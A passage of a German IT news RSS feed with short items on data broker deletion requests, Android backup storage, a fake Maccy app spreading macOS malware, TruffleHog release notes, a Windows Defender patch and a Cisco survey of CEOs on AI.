<guid isPermaLink="true">https://tsecurity.de/de/3658931/it-security-nachrichten/most-data-brokers-wont-tell-you-what-happened-to-your-deletion-request/</guid>
<pubDate>Fri, 10 Jul 2026 09:08:17 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Data brokers collect personal details on most adults in the United States and sell them to buyers that include employers, landlords, insurance companies, and government agencies. California gives residents a way to push back. You can ask a broker to delete your records, or to stop selling and sharing them. A team at UC Irvine decided to find out what happens when someone sends those requests to the whole California registry. The answer gives consumers … <a href="https://www.helpnetsecurity.com/2026/07/10/trouble-with-data-broker-deletion-requests/" rel="nofollow">More <span class="meta-nav">→</span></a></p>
<p>The post <a href="https://www.helpnetsecurity.com/2026/07/10/trouble-with-data-broker-deletion-requests/">Most data brokers won’t tell you what happened to your deletion request</a> appeared first on <a href="https://www.helpnetsecurity.com/">Help Net Security</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Google erlaubt Android-Nutzern ab sofort kein Gratis-Backup mehr]]></title>
<description><![CDATA[Google wird nun alle Daten von Android-Sicherungskopien auf den Speicherplatz im Google-Konto des Nutzers anrechnen, wie die Seite Engadget berichtet. Bislang wirkten sich lediglich Inhalte in Google Fotos sowie Bilder und Videos in MMS-Sicherungskopien auf das Speicherkontingent aus.



Für neue...]]></description>
<link>https://tsecurity.de/de/3658852/it-nachrichten/google-erlaubt-android-nutzern-ab-sofort-kein-gratis-backup-mehr/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3658852/it-nachrichten/google-erlaubt-android-nutzern-ab-sofort-kein-gratis-backup-mehr/</guid>
<pubDate>Fri, 10 Jul 2026 08:02:35 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Google wird nun alle Daten von Android-Sicherungskopien auf den Speicherplatz im Google-Konto des Nutzers anrechnen, wie die Seite <a href="https://www.engadget.com/2209189/google-will-now-count-all-android-backup-data-toward-your-storage-cap/">Engadget</a> berichtet. Bislang wirkten sich lediglich Inhalte in Google Fotos sowie Bilder und Videos in MMS-Sicherungskopien auf das Speicherkontingent aus.</p>



<p>Für neue Android-Nutzer tritt die Änderung ab heute, 7. Juli 2026, in Kraft. Für bestehende Nutzer wird sie in den kommenden Monaten schrittweise eingeführt.</p>



<p>Laut Google werden die Auswirkungen dieser Änderung voraussichtlich begrenzt sein. Android-Sicherungskopien werden im Durchschnitt etwa 40 Megabyte zusätzlichen Speicherplatz beanspruchen. Gleichzeitig werden weitere Einstellungen eingeführt, die den Nutzern mehr Kontrolle darüber geben, was gesichert wird.</p>



<p>Zuvor wurde etwa bekannt, <a href="https://www.pcwelt.de/article/3181692/alle-android-nutzer-bekommen-nun-diese-wichtige-backupfunktion.html" target="_blank" rel="noreferrer noopener">dass Android-Nutzer eine wichtige neue Backup-Funktion erhalten</a>, mit der sie selbst entscheiden können, welche App-Daten gesichert werden sollen und welche nicht. Demnächst möchte Google noch einführen, dass Nutzer ihre Geräteeinstellungen, den Anrufverlauf sowie SMS- und MMS-Nachrichten aus dem Sicherungsvorgang ausschließen können.</p>



<p>Es ist erwähnenswert, dass Google im Mai gleichzeitig den kostenlosen Speicherplatz für neue Konten <a href="https://www.pcwelt.de/article/3140205/googles-gratis-onlinespeicher-schrumpft-falls-sie-google-nicht-ihre-telefonnummer-verraten-test.html" target="_blank" rel="noreferrer noopener">von 15 Gigabyte auf 5 Gigabyte reduziert hat.</a> Es sei denn, der Nutzer verknüpft eine Telefonnummer mit dem Konto.</p>



<p>Je nachdem, wie viele Daten Sie bereits in der Google Cloud gesichert haben, könnte es also eng werden, selbst wenn die Sicherung nur wenige MB groß ist. Oder Sie merken von der Änderung nicht wirklich viel, da Sie ohnehin auf andere Backup-Methoden setzen.</p>



<p>Ein Upgrade auf 100 GB in <a href="https://one.google.com/about/plans?hl=de&amp;g1_landing_page=60" target="_blank" rel="noreferrer noopener">Google One</a> kostet 1,99 Euro monatlich, 2,99 Euro für 200 GB oder 9,99 Euro monatlich für 2 TB Speicherplatz. Mit enthalten ist auch der Zugriff auf “neue und leistungsstarke Funktionen” in Google Gemini.</p>



<p><a href="https://www.pcwelt.de/article/3006100/die-besten-online-backup-dienste-im-vergleich-2.html" target="_blank" rel="noreferrer noopener">Die besten Online-Backup-Dienste im Vergleich: Nie mehr Daten verlieren</a></p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Gefälschte Maccy-App als Einfallstor für Mac-Malware]]></title>
<description><![CDATA[Mit PamStealer wurde eine neue Schadsoftware für macOS entdeckt, die sich als der bekannte Zwischenablage-Manager Maccy ausgibt. Nach Angaben der Sicherheitsforscher von Jamf handelt es sich um einen klassischen „Infostealer“, der möglichst unauffällig Zugangsdaten und weitere vertrauliche Inform...]]></description>
<link>https://tsecurity.de/de/3658822/ios-mac-os/gefaelschte-maccy-app-als-einfallstor-fuer-mac-malware/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3658822/ios-mac-os/gefaelschte-maccy-app-als-einfallstor-fuer-mac-malware/</guid>
<pubDate>Fri, 10 Jul 2026 07:38:14 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<a href="https://www.ifun.de/gefaelschte-maccy-app-als-einfallstor-fuer-mac-malware-283422/"><img align="right" hspace="5" width="150" height="150" src="https://images.ifun.de/wp-content/uploads/2026/07/jamf-feature-150x150.jpg" class="alignright tfe wp-post-image" alt="Jamf Feature" decoding="async"></a><p>Mit PamStealer wurde eine neue Schadsoftware für macOS entdeckt, die sich als der bekannte Zwischenablage-Manager Maccy ausgibt. Nach Angaben der Sicherheitsforscher von Jamf handelt es sich um einen klassischen „Infostealer“, der möglichst unauffällig Zugangsdaten und weitere vertrauliche Informationen auslesen soll. Die Malware verbreitet sich laut Jamf über eine gefälschte Download-Seite für die Maccy-App. Nach der […]</p>
<p>The post <a href="https://www.ifun.de/gefaelschte-maccy-app-als-einfallstor-fuer-mac-malware-283422/">Gefälschte Maccy-App als Einfallstor für Mac-Malware</a> first appeared on <a href="https://www.ifun.de/">ifun.de</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[v3.95.9]]></title>
<description><![CDATA[What's Changed

feat: add OpenRouter detector by @McPatate in #4500
Integrations fully codeowns detectors by @trufflesteeeve in #5104
[INS-332] Add New Relic Insights Insert key detector by @mustansir14 in #4778
[INS-351] Added Duffel Token Detector by @MuneebUllahKhan222 in #4795
[INS-341] Added...]]></description>
<link>https://tsecurity.de/de/3658403/it-security-tools/v3959/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3658403/it-security-tools/v3959/</guid>
<pubDate>Fri, 10 Jul 2026 01:18:10 +0200</pubDate>
<category>💾 IT Security Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>What's Changed</h2>
<ul>
<li>feat: add OpenRouter detector by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/McPatate/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/McPatate">@McPatate</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3517947044" data-permission-text="Title is private" data-url="https://github.com/trufflesecurity/trufflehog/issues/4500" data-hovercard-type="pull_request" data-hovercard-url="/trufflesecurity/trufflehog/pull/4500/hovercard" href="https://github.com/trufflesecurity/trufflehog/pull/4500">#4500</a></li>
<li>Integrations fully codeowns detectors by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/trufflesteeeve/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/trufflesteeeve">@trufflesteeeve</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4789682373" data-permission-text="Title is private" data-url="https://github.com/trufflesecurity/trufflehog/issues/5104" data-hovercard-type="pull_request" data-hovercard-url="/trufflesecurity/trufflehog/pull/5104/hovercard" href="https://github.com/trufflesecurity/trufflehog/pull/5104">#5104</a></li>
<li>[INS-332] Add New Relic Insights Insert key detector by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mustansir14/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mustansir14">@mustansir14</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4001992848" data-permission-text="Title is private" data-url="https://github.com/trufflesecurity/trufflehog/issues/4778" data-hovercard-type="pull_request" data-hovercard-url="/trufflesecurity/trufflehog/pull/4778/hovercard" href="https://github.com/trufflesecurity/trufflehog/pull/4778">#4778</a></li>
<li>[INS-351] Added Duffel Token Detector by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MuneebUllahKhan222/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MuneebUllahKhan222">@MuneebUllahKhan222</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4033734488" data-permission-text="Title is private" data-url="https://github.com/trufflesecurity/trufflehog/issues/4795" data-hovercard-type="pull_request" data-hovercard-url="/trufflesecurity/trufflehog/pull/4795/hovercard" href="https://github.com/trufflesecurity/trufflehog/pull/4795">#4795</a></li>
<li>[INS-341] Added Shippo detector by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MuneebUllahKhan222/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MuneebUllahKhan222">@MuneebUllahKhan222</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4087785248" data-permission-text="Title is private" data-url="https://github.com/trufflesecurity/trufflehog/issues/4820" data-hovercard-type="pull_request" data-hovercard-url="/trufflesecurity/trufflehog/pull/4820/hovercard" href="https://github.com/trufflesecurity/trufflehog/pull/4820">#4820</a></li>
<li>[INS-467] Add IPinfo detector to default detectors list by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mustansir14/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mustansir14">@mustansir14</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4467638370" data-permission-text="Title is private" data-url="https://github.com/trufflesecurity/trufflehog/issues/4970" data-hovercard-type="pull_request" data-hovercard-url="/trufflesecurity/trufflehog/pull/4970/hovercard" href="https://github.com/trufflesecurity/trufflehog/pull/4970">#4970</a></li>
<li>fix: reject --include-repos/--exclude-repos with --repo in github scan by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kashifkhan0771/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kashifkhan0771">@kashifkhan0771</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4826176133" data-permission-text="Title is private" data-url="https://github.com/trufflesecurity/trufflehog/issues/5112" data-hovercard-type="pull_request" data-hovercard-url="/trufflesecurity/trufflehog/pull/5112/hovercard" href="https://github.com/trufflesecurity/trufflehog/pull/5112">#5112</a></li>
<li>[INS-468] Add improved lob detector to defaults.go by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mustansir14/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mustansir14">@mustansir14</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4468058771" data-permission-text="Title is private" data-url="https://github.com/trufflesecurity/trufflehog/issues/4971" data-hovercard-type="pull_request" data-hovercard-url="/trufflesecurity/trufflehog/pull/4971/hovercard" href="https://github.com/trufflesecurity/trufflehog/pull/4971">#4971</a></li>
<li>feat(action): add image input to allow registry mirror overrides by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/eightseventhreethree/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/eightseventhreethree">@eightseventhreethree</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4455074748" data-permission-text="Title is private" data-url="https://github.com/trufflesecurity/trufflehog/issues/4965" data-hovercard-type="pull_request" data-hovercard-url="/trufflesecurity/trufflehog/pull/4965/hovercard" href="https://github.com/trufflesecurity/trufflehog/pull/4965">#4965</a></li>
<li>feat: Support archived repo exclusion from GH org scans by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hibare/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hibare">@hibare</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4226077989" data-permission-text="Title is private" data-url="https://github.com/trufflesecurity/trufflehog/issues/4875" data-hovercard-type="pull_request" data-hovercard-url="/trufflesecurity/trufflehog/pull/4875/hovercard" href="https://github.com/trufflesecurity/trufflehog/pull/4875">#4875</a></li>
<li>[INT-715] Retry transient failures when verifying OpenAI keys by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bill-rich/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bill-rich">@bill-rich</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4839317359" data-permission-text="Title is private" data-url="https://github.com/trufflesecurity/trufflehog/issues/5117" data-hovercard-type="pull_request" data-hovercard-url="/trufflesecurity/trufflehog/pull/5117/hovercard" href="https://github.com/trufflesecurity/trufflehog/pull/5117">#5117</a></li>
<li>[INS-410] Added batch token detector by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MuneebUllahKhan222/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MuneebUllahKhan222">@MuneebUllahKhan222</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4094455295" data-permission-text="Title is private" data-url="https://github.com/trufflesecurity/trufflehog/issues/4824" data-hovercard-type="pull_request" data-hovercard-url="/trufflesecurity/trufflehog/pull/4824/hovercard" href="https://github.com/trufflesecurity/trufflehog/pull/4824">#4824</a></li>
<li>[INT-650] Don't log as error when git diff is too long by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bill-rich/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bill-rich">@bill-rich</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4830792626" data-permission-text="Title is private" data-url="https://github.com/trufflesecurity/trufflehog/issues/5113" data-hovercard-type="pull_request" data-hovercard-url="/trufflesecurity/trufflehog/pull/5113/hovercard" href="https://github.com/trufflesecurity/trufflehog/pull/5113">#5113</a></li>
</ul>
<h2>New Contributors</h2>
<ul>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/McPatate/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/McPatate">@McPatate</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3517947044" data-permission-text="Title is private" data-url="https://github.com/trufflesecurity/trufflehog/issues/4500" data-hovercard-type="pull_request" data-hovercard-url="/trufflesecurity/trufflehog/pull/4500/hovercard" href="https://github.com/trufflesecurity/trufflehog/pull/4500">#4500</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/eightseventhreethree/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/eightseventhreethree">@eightseventhreethree</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4455074748" data-permission-text="Title is private" data-url="https://github.com/trufflesecurity/trufflehog/issues/4965" data-hovercard-type="pull_request" data-hovercard-url="/trufflesecurity/trufflehog/pull/4965/hovercard" href="https://github.com/trufflesecurity/trufflehog/pull/4965">#4965</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/trufflesecurity/trufflehog/compare/v3.95.8...v3.95.9"><tt>v3.95.8...v3.95.9</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Verbraucherschützer kritisieren Beitragssatzstabilisierungsgesetz wegen Aushöhlung des Sonderkündigungsrechts]]></title>
<description><![CDATA[Die Bundesregierung plant eine umfassende Gesundheitsreform. Die wird immer noch kontrovers diskutiert, denn im Grunde wirft jede Seite der Politik vor, unverhältnismäßig belastet zu werden. Zudem wollen die Oppositionsparteien klagen, da es kurzfristig hunderte von Änderungen gegeben hat und die...]]></description>
<link>https://tsecurity.de/de/3657904/it-nachrichten/verbraucherschuetzer-kritisieren-beitragssatzstabilisierungsgesetz-wegen-aushoehlung-des-sonderkuendigungsrechts/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3657904/it-nachrichten/verbraucherschuetzer-kritisieren-beitragssatzstabilisierungsgesetz-wegen-aushoehlung-des-sonderkuendigungsrechts/</guid>
<pubDate>Thu, 09 Jul 2026 19:47:54 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Die Bundesregierung plant eine umfassende Gesundheitsreform. Die wird immer noch kontrovers diskutiert, denn im Grunde wirft jede Seite der Politik vor, unverhältnismäßig belastet zu werden. Zudem wollen die Oppositionsparteien klagen, da es kurzfristig hunderte von Änderungen gegeben hat und die...<p>Zum Beitrag: <a href="https://stadt-bremerhaven.de/verbraucherschuetzer-kritisieren-beitragssatzstabilisierungsgesetz-wegen-aushoehlung-des-sonderkuendigungsrechts/">Verbraucherschützer kritisieren Beitragssatzstabilisierungsgesetz wegen Aushöhlung des Sonderkündigungsrechts</a>
</p><p>
Wo du uns folgen kannst:
<a href="http://www.facebook.com/CaschysBlog">Facebook</a>, <a href="https://www.reddit.com/r/CaschysBlog/">Reddit</a>, <a href="https://news.google.com/publications/CAAqMQgKIitDQklTR2dnTWFoWUtGSE4wWVdSMExXSnlaVzFsY21oaGRtVnVMbVJsS0FBUAE?ceid=DE:de&amp;oc=3">Google News</a>, <a href="https://x.com/CaschysBlog">X</a>, <a href="https://www.threads.com/@caschysblog">Threads</a>
<br>
</p><div>
    <strong>Auf dem Laufenden bleiben?</strong>
    <br>
    <a href="https://www.google.com/preferences/source?q=stadt-bremerhaven.de">Fügt uns doch bei Google als bevorzugte Quelle hinzu!</a>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[WLAN-Fehler vermeiden: Diese Router-Einstellung schützt euch vor bis zu 500.000 Euro Bußgeld]]></title>
<description><![CDATA[Mit einem einfachen Haken in den Router-Einstellungen seid ihr auf der sicheren Seite.]]></description>
<link>https://tsecurity.de/de/3657609/it-nachrichten/wlan-fehler-vermeiden-diese-router-einstellung-schuetzt-euch-vor-bis-zu-500000-euro-bussgeld/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3657609/it-nachrichten/wlan-fehler-vermeiden-diese-router-einstellung-schuetzt-euch-vor-bis-zu-500000-euro-bussgeld/</guid>
<pubDate>Thu, 09 Jul 2026 18:02:30 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Mit einem einfachen Haken in den Router-Einstellungen seid ihr auf der sicheren Seite.]]></content:encoded>
</item>
<item>
<title><![CDATA[Microsoft behebt kritische Sicherheitslücke in Windows Defender]]></title>
<description><![CDATA[Vor circa einem Monat veröffentlichte der anonyme Sicherheitsforscher Nightmare Eclipse Informationen über Rogue Planet, eine sogenannte Zero-Day-Schwachstelle in der Defender-Sicherheitssoftware von Microsoft.



Die Sicherheitslücke, die offiziell als CVE-2026-50656 bezeichnet wurde, kann von H...]]></description>
<link>https://tsecurity.de/de/3657569/it-nachrichten/microsoft-behebt-kritische-sicherheitsluecke-in-windows-defender/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3657569/it-nachrichten/microsoft-behebt-kritische-sicherheitsluecke-in-windows-defender/</guid>
<pubDate>Thu, 09 Jul 2026 17:46:26 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Vor circa einem Monat veröffentlichte der anonyme Sicherheitsforscher Nightmare Eclipse <a href="https://www.pcwelt.de/article/3170412/microsoft-verspricht-sicherheitsluecke-in-defender-zu-schliessen.html" target="_blank" rel="noreferrer noopener">Informationen über Rogue Planet</a>, eine sogenannte Zero-Day-Schwachstelle in der <a href="https://www.pcwelt.de/article/2652374/was-ist-microsoft-defender-und-wie-gut-schutzt-es-vor-viren-und-anderen-bedrohungen.html" target="_blank" rel="noreferrer noopener">Defender</a>-Sicherheitssoftware von Microsoft.</p>



<p>Die Sicherheitslücke, die offiziell als CVE-2026-50656 bezeichnet wurde, kann von Hackern ausgenutzt werden, um vollen Zugriff auf Ihren Computer zu erlangen.</p>



<p>Die Seite <a href="https://www.bleepingcomputer.com/news/microsoft/microsoft-patches-rogueplanet-defender-zero-day-vulnerability/" target="_blank" rel="noreferrer noopener">Bleeping Computer</a> berichtet nun, dass Microsoft einen Sicherheitsfix für Rogue Planet veröffentlicht hat, und zwar über ein Update der Malware Protection Engine (der zentralen Scan-Engine, auf der Microsofts Sicherheitslösungen und -dienste basieren). Sie bekommen den Patch automatisch über Windows Update.</p>



<p>„Microsoft hat ein Update für die Microsoft Malware Protection Engine veröffentlicht, das die unter der Kennung CVE-2026-50656 identifizierte Sicherheitslücke behebt. Weitere Informationen dazu, wie Sie überprüfen können, ob die neue Version installiert wurde, finden Sie in den FAQ“, teilte Microsoft zudem in einem <a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-50656/" target="_blank" rel="noreferrer noopener">Supportdokument </a>mit.</p>



<p><em>Übrigens: Sollten Sie Windows 11 Home im Einsatz haben, dann entgehen Ihnen die vielen Vorteile der Pro-Version, die wir Ihnen <a href="https://www.pcwelt.de/article/1203134/windows-11-unterschiede-zwischen-home-und-pro-version.html" target="_blank" rel="noreferrer noopener">hier vorstellen.</a> Im PC-WELT Software-Shop ist das Windows-11-Upgrade <a href="https://software.pcwelt.de/offer/windows_11_professional_upgrade/44487?x-source=4-0-3178649-1-0-0-0-0?x-source=rss" target="_blank" rel="noreferrer noopener">für günstige 59,99 Euro statt 145 Euro</a> erhältlich.</em></p>



<p>Kürzlich teilte derselbe Sicherheitsforscher Informationen über eine breite Palette von Sicherheitslücken in Windows mit, darunter Blue Hammer, Red Sun, Green Plasma, Mini Plasma, Yellow Key und Undefend. Und legte sich mit Microsoft selbst an, indem er seinen Unmut über dessen Security Response Center mit der Welt teilte.</p>



<p><strong>Lesetipp: </strong><a href="https://www.pcwelt.de/article/2043389/windows-defender-einrichten-nutzen.html" target="_blank" rel="noreferrer noopener">Windows Defender optimal einrichten und nutzen</a></p>



<p><em>Dieser Artikel erschien zuerst bei unserer Schwesterpublikation </em><a href="https://www.pcforalla.se/" target="_blank" rel="noreferrer noopener"><em>PC för Alla</em></a><em> und wurde aus dem Schwedischen übersetzt und lokalisiert.</em></p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[CEOs befürchten, zu langsam in KI zu investieren]]></title>
<description><![CDATA[Uwe Peter, Deutschland-Chef von Cisco, zu den Studienergebnissen: „KI ist kein Experiment, kein Selbstzweck, sondern das Betriebssystem unserer Wirtschaft.“
Cisco/by Pavelbecker



In den Chefetagen weltweit herrscht derzeit eine paradoxe Mischung aus Euphorie und Nervosität. So hat der Cisco-Stu...]]></description>
<link>https://tsecurity.de/de/3657507/it-security-nachrichten/ceos-befuerchten-zu-langsam-in-ki-zu-investieren/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3657507/it-security-nachrichten/ceos-befuerchten-zu-langsam-in-ki-zu-investieren/</guid>
<pubDate>Thu, 09 Jul 2026 17:22:21 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Uwe-Peter-2_16_9.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Cisco" class="wp-image-4195087" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Uwe Peter, Deutschland-Chef von Cisco, zu den Studienergebnissen: „KI ist kein Experiment, kein Selbstzweck, sondern das Betriebssystem unserer Wirtschaft.“</p>
</figcaption></figure><p class="imageCredit">Cisco/by Pavelbecker</p></div>



<p>In den Chefetagen weltweit herrscht derzeit eine paradoxe Mischung aus Euphorie und Nervosität. So hat der Cisco-Studie „<a href="https://www.cisco.com/c/m/en_us/solutions/ai/readiness-index/how-ceos-see-ai-in-2026.html" target="_blank" rel="noreferrer noopener">How CEOs see AI in 2026</a>“ zufolge der Optimismus bezüglich der Potenziale künstlicher Intelligenz mit 91 Prozent einen neuen Höchststand erreicht. Auf der anderen Seite gibt es aber auch tiefe Sorgenfalten: 65 Prozent der CEOs befürchten, zu wenig in KI zu investieren – ein deutlicher Sprung im Vergleich zu 53 Prozent im Vorjahr.</p>



<p>So ist KI ist längst kein nettes Extra mehr. Für mehr als zwei Drittel der Befragten (69 Prozent) ist die Technologie bereits unverzichtbar geworden. Oder wie es Uwe Peter, Deutschland-Chef von Cisco, formuliert: „KI ist kein Experiment, kein Selbstzweck, sondern das Betriebssystem unserer Wirtschaft.“ So sei die Zeit der vorsichtigen Pilotprojekte vorbei; die Frage sei nicht mehr, ob die Technik funktioniert, sondern, ob die Unternehmen bereit für die massive Last sind, die sie verursacht.</p>



<h2 class="wp-block-heading">Nadelöhr Technik</h2>



<p>So zerplatzen viele KI-Projekte in der Realität an der Leistungsfähigkeit der Hardware. 53 Prozent der CEOs fürchten, dass Infrastrukturengpässe ihre KI-Pläne ausbremsen. Das Upgrade für KI-Workloads hat daher für das Jahr 2026 oberste Priorität.</p>



<p>Die Zahlen aus dem ergänzenden „<a href="https://www.computerwoche.de/article/4075526/ki-lucke-nur-zwolf-prozent-fit-verliert-deutschland-den-anschluss.html?utm=hybrid_search" target="_blank">Cisco AI Readiness Index</a>“ zeichnen ein noch deutlicheres Bild der Herausforderungen:</p>



<ul class="wp-block-list">
<li>Lediglich 22 Prozent der Unternehmen stufen ihr aktuelles Netzwerk als optimal für KI-Workloads ein.</li>



<li>Nur 19 Prozent verfügen über vollständig zentralisierte Daten, die für KI-Anwendungen zugänglich sind.</li>



<li>Jeder dritte CEO sieht in fragmentierten Daten ein zentrales Hindernis für den Fortschritt.</li>
</ul>



<p>Noch vor einem Jahr fühlten sich viele Vorstände von ihrem eigenen mangelnden Verständnis für KI gelähmt. Diese Wissenslücke schließt sich jedoch in rasantem Tempo: Der Anteil der CEOs, die sich durch fehlendes KI-Wissen in ihren Entscheidungen behindert fühlen, sank innerhalb von zwölf Monaten von 74 Prozent auf 47 Prozent. Mit dem wachsenden Durchblick steigt jedoch auch das Bewusstsein für die Komplexität der Umsetzung, insbesondere bei der Sicherheit und Kontrolle autonomer KI-Agenten. Nur 31 Prozent der Unternehmen trauen sich aktuell zu, diese Agenten ausreichend abzusichern.</p>



<h2 class="wp-block-heading">Der Mensch als Aufsicht</h2>



<p>Entgegen mancher Untergangsszenarien sehen CEOs die KI nicht als Ersatz für den Menschen. Die Integration von KI-Agenten in Arbeitsprozesse steht zwar weit oben auf der Agenda. 72 Prozent der Befragten erwarten jedoch, dass KI auch künftig nur unter menschlicher Anleitung und Aufsicht agiert. Im Zentrum der Strategie für 2026 steht das Bild eines „Mensch-KI-Teams“. Hierbei wird die Belegschaft gezielt weitergebildet, um die neuen digitalen Kollegen produktiv und verantwortungsvoll zu steuern</p>



<p>Unter dem Strich kommt die Studie zu einem klaren Fazit: Der Wille zur KI-Revolution ist da, doch er erfordert ein massives Upgrade der Infrastruktur und eine Zentralisierung der Datenbestände.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Windows 11 KI-Funktionen: Live-Untertitel, Übersetzung und Recall – das brauchen Sie wirklich]]></title>
<description><![CDATA[Windows 11 bringt mehrere KI-Funktionen mit, die sofort weiterhelfen. Live-Untertitel zeigen jeden Ton als Text, eine Echtzeit-Übersetzung läuft auf passender Hardware, und Recall durchsucht zurückliegende Bildschirminhalte. Manches steht jedem offen, anderes hängt am Gerät.



Microsoft verteilt...]]></description>
<link>https://tsecurity.de/de/3657190/it-nachrichten/windows-11-ki-funktionen-live-untertitel-uebersetzung-und-recall-das-brauchen-sie-wirklich/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3657190/it-nachrichten/windows-11-ki-funktionen-live-untertitel-uebersetzung-und-recall-das-brauchen-sie-wirklich/</guid>
<pubDate>Thu, 09 Jul 2026 15:32:35 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



